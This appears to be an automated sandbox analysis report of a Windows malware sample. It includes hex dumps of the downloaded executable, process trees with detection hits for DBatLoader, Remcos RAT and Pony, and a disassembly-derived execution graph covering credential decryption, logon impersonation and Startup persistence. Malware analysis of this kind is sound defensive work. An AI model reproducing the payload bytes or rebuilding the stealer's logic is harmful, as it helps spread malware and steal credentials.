                                              Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 56 06 00 00 ac 06 00 00 00 00 00 d8 64 06 00 00 10 00 00 00 70 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 [TRUNCATED]
                                              Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*Vdp@p@$psCODE`V `DATA pZ@BSSn.idata0&n@.tls.rdata@P.reloct@P.rsrcp@P@P
                                              Dec 13, 2024 17:57:34.496505976 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@Str
                                              Dec 13, 2024 17:57:34.496520996 CET1236INData Raw: 89 04 24 8b 44 24 04 8b 14 24 89 10 8b 44 24 04 89 58 04 8b 04 24 8b 54 24 04 89 50 04 8b 44 24 04 89 03 b0 01 59 5a 5e 5b c3 83 c4 f8 8b 50 04 89 14 24 8b 10 89 54 24 04 8b 14 24 8b 4c 24 04 89 0a 8b 54 24 04 8b 0c 24 89 4a 04 8b 15 e4 95 46 00
                                              Data Ascii: $D$$D$X$T$PD$YZ^[P$T$$L$T$$JFFYZSVWUBCD$R/M;u@@CC;uq@CD$;7uu3YZ]_^[@SVWU$
                                              Dec 13, 2024 17:57:34.496661901 CET672INData Raw: f0 8b fc bd f8 95 46 00 81 c6 ff 3f 00 00 81 e6 00 c0 ff ff 8b 45 00 89 07 eb 41 8b 07 3b 70 0c 7f 34 8b cb 8b 07 8b 40 08 8b d6 e8 4a fe ff ff 83 3b 00 74 5f 8b 43 04 8b 17 01 42 08 8b 43 04 8b 17 29 42 0c 8b 07 83 78 0c 00 75 47 8b 07 e8 02 fb
                                              Data Ascii: F?EA;p4@J;t_CBC)BxuG>;/um;t&L$|$uL$S"3]_^[SVWU$t$F?E;.t;Xu;Xu_;x+P
                                              Dec 13, 2024 17:57:34.496676922 CET1236INData Raw: e8 b1 f7 ff ff b8 e8 95 46 00 e8 43 f8 ff ff b8 f8 95 46 00 e8 39 f8 ff ff b8 24 96 46 00 e8 2f f8 ff ff 68 f8 0f 00 00 6a 00 e8 5f f7 ff ff a3 20 96 46 00 83 3d 20 96 46 00 00 74 40 b8 03 00 00 00 8b 15 20 96 46 00 33 c9 89 4c 82 f4 40 3d 01 04
                                              Data Ascii: FCF9$F/hj_ F= Ft@ F3L@=uEFEUPEUEFF3ZYYdh@=IFthF!7+FY]U=F3Uh@d0d =IFthFF FP
                                              Dec 13, 2024 17:57:34.496694088 CET1236INData Raw: f4 8b 04 24 8b 14 24 89 50 04 8b 04 24 8b 14 24 89 10 e9 88 00 00 00 8b 44 24 04 8b 00 89 44 24 08 8b 04 24 8b 54 24 04 89 50 04 8b 04 24 8b 54 24 08 89 10 8b 44 24 04 8b 14 24 89 10 8b 44 24 08 8b 14 24 89 50 04 eb 56 81 fb 00 3c 00 00 7c 0d 8b
                                              Data Ascii: $$P$$D$D$$T$P$T$D$$D$$PV<|uAFD$$FD$D$$T$P$T$D$$D$$P^[=F~@=F}F+FFF3F3FS
                                              Dec 13, 2024 17:57:34.496710062 CET1236INData Raw: ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 c7 25 40 00 80 3d 49 90 46 00 00 74 0a 68 c8 95 46 00 e8 f1 ed ff ff c3 e9 07 22 00 00 eb e5 8b 45 fc 5b 8b e5 5d c3 90 55 8b ec 83 c4 f0 53 8b d8 33 c0 a3 c4 95 46 00 80 3d c0 95 46 00 00 75 1f e8 da f5
                                              Data Ascii: E3ZYYdh%@=IFthF"E[]US3F=FuuFE3Uh'@d2d"=IFthF]EEEuF F%)FtSE@|tF
                                              Dec 13, 2024 17:57:34.496726036 CET1236INData Raw: fc 5e 5b 59 59 5d c3 8d 40 00 53 51 8b d8 85 db 7e 1a 8b c3 ff 15 44 70 46 00 89 04 24 83 3c 24 00 75 0e b0 01 e8 60 01 00 00 eb 05 33 c0 89 04 24 8b 04 24 5a 5b c3 8d 40 00 53 85 c0 74 15 ff 15 48 70 46 00 8b d8 85 db 74 0b b0 02 e8 38 01 00 00
                                              Data Ascii: ^[YY]@SQ~DpF$<$u`3$$Z[@StHpFt83[t2tPLpFYtHpFutPDpFYt@DtD@3QDtD@$3$
                                              Dec 13, 2024 17:57:34.496843100 CET896INData Raw: 28 90 46 00 00 74 06 ff 15 28 90 46 00 b8 d2 00 00 00 e9 a7 1e 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 1a 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00
                                              Data Ascii: (Ft(FSVfCf=rf=vf+f=tfs{Hu{uCx0@Stu^[ffS3C3CjCPCPCPP5umu3[3[@3SVQsu3&jD$PVCPPu
                                              Dec 13, 2024 17:57:34.496859074 CET1236INData Raw: 85 db 74 07 8b c3 e8 57 f9 ff ff 8b c3 5b c3 8d 40 00 8b 50 1c e8 b0 ff ff ff c3 8d 40 00 8b 50 20 e8 a4 ff ff ff c3 8d 40 00 ff 25 e8 a1 46 00 8b c0 55 8b ec 51 53 56 57 8b f1 8b fa 8b d8 8b 45 10 0f b7 53 04 23 d0 3b c2 75 58 6a 00 8d 45 fc 50
                                              Data Ascii: tW[@P@P @%FUQSVWES#;uXjEPCPWPUub3E?E3sEEtEU#;utE3Eg3EE_^[Y]US]Shh2@jd[[]SV3fCf=r/f=w
                                              Dec 13, 2024 17:57:34.616681099 CET1236INData Raw: 40 00 83 ff 03 74 04 6a f6 eb 02 6a f5 e8 6c da ff ff eb de b8 66 00 00 00 eb 0b 66 c7 43 04 b0 d7 e8 d0 da ff ff e8 63 f4 ff ff 5f 5e 5b c3 8d 40 00 8a 0d 0c 70 46 00 80 e1 03 80 f9 02 76 02 b1 02 81 e1 ff 00 00 00 e8 05 ff ff ff c3 53 89 c3 89
                                              Data Ascii: @tjjlffCc_^[@pFvS< wu[K2[SVWR1)110Cu}-CGL$~)~O DGKu_^[SVWPtl11F t-tb+


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:57:27
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.2049993958.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:11:57:35
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\SGS.exe"
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Temp\SGS.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 79%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:11:57:36
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:11:57:36
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:11:57:40
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: pony, Description: Identify Pony, Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:11:57:42
                                              Start date:13/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:11:57:42
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:11:57:45
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 74%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:11:57:51
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\SGS.exe"
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:11:57:53
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:11:57:55
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: pony, Description: Identify Pony, Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:11:57:57
                                              Start date:13/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:11:57:57
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Non-executed Functions

                                                Function 0222B2E5 Relevance: 2.8, Instructions: 2799COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143868303.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2220000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5e4e2b3691246fd291f0ad1a53b97275ad19edd271169cf4831239db7ec05da
                                                • Instruction ID: 28f1880550f891e5c3b6630ef184ca88fc3c85a1f7fc5f4aeb60d29868deb5d2
                                                • Opcode Fuzzy Hash: a5e4e2b3691246fd291f0ad1a53b97275ad19edd271169cf4831239db7ec05da
                                                • Instruction Fuzzy Hash: 3FE1467241D7D16FCB128BB0AAA22917F78FE1331DB1914DAC4C18F0A7D362592ED792

                                                Execution Graph

                                                Execution Coverage:28.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12.3%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:31
                                                execution_graph 11925 40c587 11926 40c596 11925->11926 11927 40c59a MultiByteToWideChar 11925->11927 11937 4018cf LocalAlloc 11927->11937 11929 40c5b7 MultiByteToWideChar StgOpenStorage 11932 40c5eb 11929->11932 11933 40c660 11929->11933 11930 4018b8 LocalFree 11931 40c67b 11930->11931 11932->11933 11938 4018cf LocalAlloc 11932->11938 11933->11930 11935 40c620 11936 4018b8 LocalFree 11935->11936 11936->11933 11937->11929 11938->11935 8588 40fe88 8589 410061 8588->8589 8594 40fe96 8588->8594 8592 40fed4 wsprintfA 8593 401e4c 6 API calls 8592->8593 8593->8594 8594->8589 8594->8592 8595 40ff51 GetTempPathA 8594->8595 8596 4018b8 LocalFree 8594->8596 8597 40ff75 GetTickCount wsprintfA CreateDirectoryA 8594->8597 8606 403d6d 8594->8606 8614 401788 GetHGlobalFromStream 8594->8614 8595->8594 8596->8594 8602 40ffa9 8597->8602 8598 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8598->8602 8600 401e4c 6 API calls 8600->8602 8601 40fffb lstrlen 8603 4026dd 19 API calls 8601->8603 8602->8598 8602->8600 8602->8601 8604 4018b8 LocalFree 8602->8604 8621 401463 ExitProcess 8602->8621 8605 410016 ShellExecuteA 8603->8605 8604->8594 8605->8602 8607 403d7a 8606->8607 8627 403bff 8607->8627 8610 403db2 8610->8594 8611 403bff 24 API calls 8612 403da9 8611->8612 8613 4018b8 LocalFree 8612->8613 8613->8610 8615 4017c9 8614->8615 8616 40179e 8614->8616 8615->8594 8617 4017a6 GlobalLock 8616->8617 8617->8615 8618 4017b5 8617->8618 8657 402497 8618->8657 8622 4014df 8621->8622 8626 40148c 8621->8626 8622->8602 8623 4014bc 8624 4014d7 CloseHandle 8623->8624 8624->8622 8625 401422 WriteFile 8625->8626 8626->8623 8626->8624 8626->8625 8654 4018cf LocalAlloc 8627->8654 8629 403c13 8655 4018cf LocalAlloc 8629->8655 8631 403c20 8656 4018cf LocalAlloc 8631->8656 8633 403c2d InternetCrackUrlA 8634 403c74 8633->8634 8635 403c7a 8633->8635 8634->8635 8636 403c7f InternetCreateUrlA 8634->8636 8638 4018b8 LocalFree 8635->8638 8636->8635 8637 403ca4 InternetCrackUrlA 8636->8637 8637->8635 8639 403ce5 8637->8639 8640 403d55 8638->8640 8639->8635 8641 403ced wsprintfA 8639->8641 8642 4018b8 LocalFree 8640->8642 8644 403800 5 API calls 8641->8644 8643 403d5d 8642->8643 8645 4018b8 LocalFree 8643->8645 8646 403d12 8644->8646 8647 403d65 8645->8647 8646->8635 8648 403d18 lstrlen 8646->8648 8647->8610 8647->8611 8649 403884 send 8648->8649 8650 403d2f 8649->8650 8651 403d33 closesocket 8650->8651 8652 403a78 12 API calls 8650->8652 8651->8635 8652->8651 8654->8629 8655->8631 8656->8633 8662 4018cf LocalAlloc 8657->8662 8659 4024ab 8660 4018b8 LocalFree 8659->8660 8661 4017c1 GlobalUnlock 8660->8661 8661->8615 8662->8659 8263 401011 CreateStreamOnHGlobal 8348 4105d6 SetUnhandledExceptionFilter 8349 4105e0 8348->8349 8360 40fa90 8349->8360 8351 410607 8365 410223 8351->8365 8352 4105e5 8352->8351 8353 410601 RevertToSelf 8352->8353 8353->8351 8355 410616 8371 41032d 8355->8371 8357 41061b 8388 410065 8357->8388 8359 410620 8361 40faa3 8360->8361 8362 40faa4 8360->8362 8361->8352 8363 40fae9 8362->8363 8364 40fabf GetTickCount 8362->8364 8363->8352 8364->8362 8366 410236 8365->8366 8369 410237 8365->8369 8366->8355 8367 41024a 8367->8355 8368 402aaa LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 8368->8369 8369->8367 8369->8368 8419 4018cf LocalAlloc 8369->8419 8372 410341 8371->8372 8381 410342 8371->8381 8372->8357 8373 410355 8373->8357 8374 410374 lstrcmpiA 8375 41038b LogonUserA 8374->8375 8374->8381 8375->8381 8376 41043a 74701B10 8376->8381 8378 4103b9 lstrlen LCMapStringA 8380 4103df LogonUserA 8378->8380 8378->8381 8379 41049f ImpersonateLoggedOnUser 8379->8381 8380->8381 8381->8373 8381->8374 8381->8375 8381->8376 8381->8379 8382 4018b8 LocalFree 8381->8382 8383 4104d0 746F5030 8381->8383 8384 4104db CloseHandle 8381->8384 8385 410417 LogonUserA 8381->8385 8386 4104c0 8381->8386 8387 4104ba RevertToSelf 8381->8387 8420 402a1d lstrlen 8381->8420 8382->8381 8383->8384 8384->8381 8385->8376 8385->8381 8386->8381 8387->8386 8389 410077 8388->8389 8390 410078 8388->8390 8389->8359 8424 4018cf LocalAlloc 8390->8424 8392 410088 GetTickCount wsprintfA 8425 4018cf LocalAlloc 8392->8425 8394 4100b2 8426 4018cf LocalAlloc 8394->8426 8396 4100ca 8427 4018cf LocalAlloc 8396->8427 8398 4100dd GetModuleFileNameA GetTempPathA 8399 41012f ExitProcess 8398->8399 8400 41011f lstrcat 8398->8400 8400->8399 8419->8369 8423 4018cf LocalAlloc 8420->8423 8422 402a2f lstrcpy 8422->8378 8423->8422 8424->8392 8425->8394 8426->8396 8427->8398 8663 402bda 8664 402be4 8663->8664 8666 402bfc 8664->8666 8667 402968 8664->8667 8668 402978 8667->8668 8669 40298a 8667->8669 8668->8669 8670 402991 LookupPrivilegeValueA 8668->8670 8669->8664 8671 4029ad GetCurrentProcess OpenProcessToken 8670->8671 8676 402a07 8670->8676 8674 4029ee AdjustTokenPrivileges 8671->8674 8675 4029c5 8671->8675 8672 402a16 8672->8664 8673 402a0e CloseHandle 8673->8672 8674->8676 8675->8674 8676->8672 8676->8673 11577 41051e OleInitialize 11595 402530 11577->11595 11580 40fa90 GetTickCount 11581 41052d 11580->11581 11612 402c01 11581->11612 11583 410537 11596 4024d6 2 API calls 11595->11596 11597 40253f 11596->11597 11598 4024d6 2 API calls 11597->11598 11599 40254e 11598->11599 11600 4024d6 2 API calls 11599->11600 11601 40255d 11600->11601 11602 4024d6 2 API calls 11601->11602 11603 40256c 11602->11603 11604 4024d6 2 API calls 11603->11604 11605 40257b 11604->11605 11606 4024d6 2 API calls 11605->11606 11607 40258a 11606->11607 11608 4024d6 2 API calls 11607->11608 11609 402599 11608->11609 11610 4024d6 2 API calls 11609->11610 11611 4025a8 11610->11611 11611->11580 11613 402c14 11612->11613 11615 402c15 11612->11615 11613->11583 11614 402c31 11614->11583 11615->11614 11616 402c36 GetCurrentProcess OpenProcessToken 11615->11616 8269 40fc62 8271 40fc6a 8269->8271 8270 40fc7e 8271->8270 8287 4017d5 GetHGlobalFromStream 8271->8287 8273 40fc96 8273->8270 8301 401675 GetHGlobalFromStream 8273->8301 8275 40fca4 8275->8270 8307 4016db GetHGlobalFromStream 8275->8307 8277 40fcb2 8277->8270 8315 401a27 GetHGlobalFromStream 8277->8315 8279 40fcc5 8279->8270 8280 401675 3 API calls 8279->8280 8281 40fcd3 8280->8281 8281->8270 8282 4016db 3 API calls 8281->8282 8283 40fce1 8282->8283 8283->8270 8284 40fce7 8283->8284 8325 401aec GetTickCount GetHGlobalFromStream 8284->8325 8286 40fcef 8286->8270 8288 4017f2 8287->8288 8289 4018a9 8287->8289 8290 4017fa GlobalLock 8288->8290 8289->8273 8290->8289 8291 40180d 8290->8291 8335 4018cf LocalAlloc 8291->8335 8293 401826 8336 4018cf LocalAlloc 8293->8336 8295 40183f 8296 401855 GlobalUnlock 8295->8296 8297 40186b 8296->8297 8337 4018b8 8297->8337 8300 4018b8 LocalFree 8300->8289 8302 401692 8301->8302 8304 4016bf 8301->8304 8303 40169a GlobalLock 8302->8303 8303->8304 8305 4016a9 8303->8305 8304->8275 8306 4016b4 GlobalUnlock 8305->8306 8306->8304 8308 401745 8307->8308 8309 4016f8 8307->8309 8308->8277 8310 401735 8309->8310 8311 401709 GlobalLock 8309->8311 8310->8277 8312 401719 8311->8312 8314 40174b 8311->8314 8313 401724 GlobalUnlock 8312->8313 8313->8314 8314->8277 8316 401a47 8315->8316 8317 401add 8315->8317 8318 401a4f GlobalLock 8316->8318 8317->8279 8318->8317 8319 401a5e 8318->8319 8340 4018cf LocalAlloc 8319->8340 8321 401a69 8322 401a7a GlobalUnlock lstrlen 8321->8322 8323 401a9a 8322->8323 8324 4018b8 LocalFree 8323->8324 8324->8317 8326 401bb1 8325->8326 8327 401b1c 8325->8327 8326->8286 8328 401b24 GlobalLock 8327->8328 8328->8326 8329 401b33 8328->8329 8335->8293 8336->8295 8338 4018c1 LocalFree 8337->8338 8339 4018a1 8337->8339 8338->8339 8339->8300 8340->8321 8342 401226 ExitProcess 8343 401241 8342->8343 8344 401245 ReadFile 8342->8344 8345 401271 8344->8345 8346 401263 CloseHandle 8344->8346 8345->8344 8347 401289 CloseHandle 8345->8347 11877 40b8e7 11878 40ba2a 11877->11878 11879 4018b8 LocalFree 11878->11879 11880 40ba32 11879->11880 8264 410630 8265 410642 8264->8265 8266 41062f GetTickCount 8264->8266 8268 41064b ExitProcess 8265->8268 8266->8265 11993 40bc36 11994 40bc4d 11993->11994 11995 40bc44 11993->11995 11995->11994 11996 40bcc8 CryptUnprotectData 11995->11996 11996->11994 11997 40bcfb 11996->11997 11997->11994 11998 40bd1f LocalFree 11997->11998 11998->11994 11999 40bd37 11998->11999 11999->11994 12008 4018cf LocalAlloc 11999->12008 12001 40bd53 12002 40bd64 lstrlen StrCmpNIA 12001->12002 12003 40bd80 lstrlen StrCmpNIA 12002->12003 12004 40bd98 12002->12004 12003->12004 12005 40bd9c lstrlen StrCmpNIA 12004->12005 12007 40bdb4 12004->12007 12005->12007 12006 4018b8 LocalFree 12006->11994 12007->12006 12008->12001 8432 40fd78 8442 403ffb WSAStartup 8432->8442 8434 40fe61 8435 40fe4d 8435->8434 8462 4026dd RegCreateKeyA 8435->8462 8436 40fd7d 8436->8434 8436->8435 8439 40fb14 6 API calls 8436->8439 8440 40fe2c Sleep 8436->8440 8443 403f97 8436->8443 8452 401bc0 GetHGlobalFromStream 8436->8452 8439->8436 8440->8436 8442->8436 8444 403fec 8443->8444 8445 403fa6 8443->8445 8444->8436 8445->8444 8446 403fac GetHGlobalFromStream 8445->8446 8446->8444 8447 403fbc 8446->8447 8448 403fc4 GlobalLock 8447->8448 8448->8444 8449 403fd3 8448->8449 8487 403de5 8449->8487 8453 401be0 8452->8453 8454 401c7e 8452->8454 8453->8454 8455 401bf5 GlobalLock 8453->8455 8454->8436 8455->8454 8456 401c01 8455->8456 8572 4018cf LocalAlloc 8456->8572 8458 401c0c 8459 401c1d GlobalUnlock 8458->8459 8460 401c36 8459->8460 8461 4018b8 LocalFree 8460->8461 8461->8454 8463 402701 RegSetValueExA 8462->8463 8464 402723 8462->8464 8465 40271a 8463->8465 8466 40271b RegCloseKey 8463->8466 8467 4027f0 8464->8467 8468 40272b GetTempPathA 8464->8468 8465->8466 8466->8464 8467->8434 8468->8467 8469 402744 8468->8469 8469->8467 8470 40274f CreateDirectoryA 8469->8470 8471 402769 8470->8471 8472 402789 8471->8472 8473 40276d 8471->8473 8474 401df8 5 API calls 8472->8474 8573 401df8 8473->8573 8476 402798 ExitProcess 8474->8476 8478 4027d6 8476->8478 